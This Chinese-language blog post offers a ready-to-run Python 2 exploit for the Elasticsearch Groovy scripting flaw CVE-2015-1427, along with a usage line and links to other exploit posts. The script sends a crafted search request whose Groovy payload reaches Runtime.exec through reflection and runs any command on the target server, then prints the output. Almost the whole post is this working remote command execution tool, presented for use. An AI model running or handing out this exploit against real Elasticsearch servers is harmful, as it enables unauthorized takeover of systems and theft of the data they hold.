关注我们
QRcode 邮件联系 QRcode

Elasticsearch Groovy任意命令执行漏洞EXP

 feng  1,231 ℃  1条点评

Elasticsearch Groovy 脚本动态执行漏洞分析和poc(CVE-2015-1427)

#!/usr/bin/env python
import urllib
import urllib2
import json
import sys
def execute(url,command):
parameters = {"size":1,
"script_fields":
{"iswin":
{"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).\
newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.\
class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"%s\").\
getInputStream())).readLines()" % command,"lang": "groovy"}
}
}
data = json.dumps(parameters)
try:
request=urllib2.Request(url+"_search?pretty",data)
request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36')
response=urllib2.urlopen(request)
result = json.loads(response.read())["hits"]["hits"][0]["fields"]["iswin"][0]
for i in result:
print i
except Exception, e:
print e
if __name__ == '__main__':
if len(sys.argv) != 3:
print "usage %s url command" % sys.argv[0]
else:
execute(sys.argv[1],sys.argv[2])

用法:
python elasticsearch.py http://ip:9200/ ifconfig

Linux关闭ssh远程连接时Screen保持任务会话
PHP批量抓取百度搜索结果
DNS服务器软件BIND 9 TKEY查询拒绝服务漏洞CVE-2015-5477 pocDNS服务器软件BIND 9 TKEY查询拒绝服务漏洞CVE-2015-5477 pocElasticsearch Groovy漏洞利用工具java版Elasticsearch Groovy漏洞利用工具java版IE浏览器远程代码执行漏洞(MS14-065)IE浏览器远程代码执行漏洞(MS14-065)OpenSSH SFTP 远程溢出漏洞OpenSSH SFTP 远程溢出漏洞

已有1条评论,欢迎点评!

smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley

  1. avatar
    #1 Henry

    学习了,Elasticsearch看起来不错的样子

    2015-03-05 上午 2:42回复


注册帐号  |  忘记密码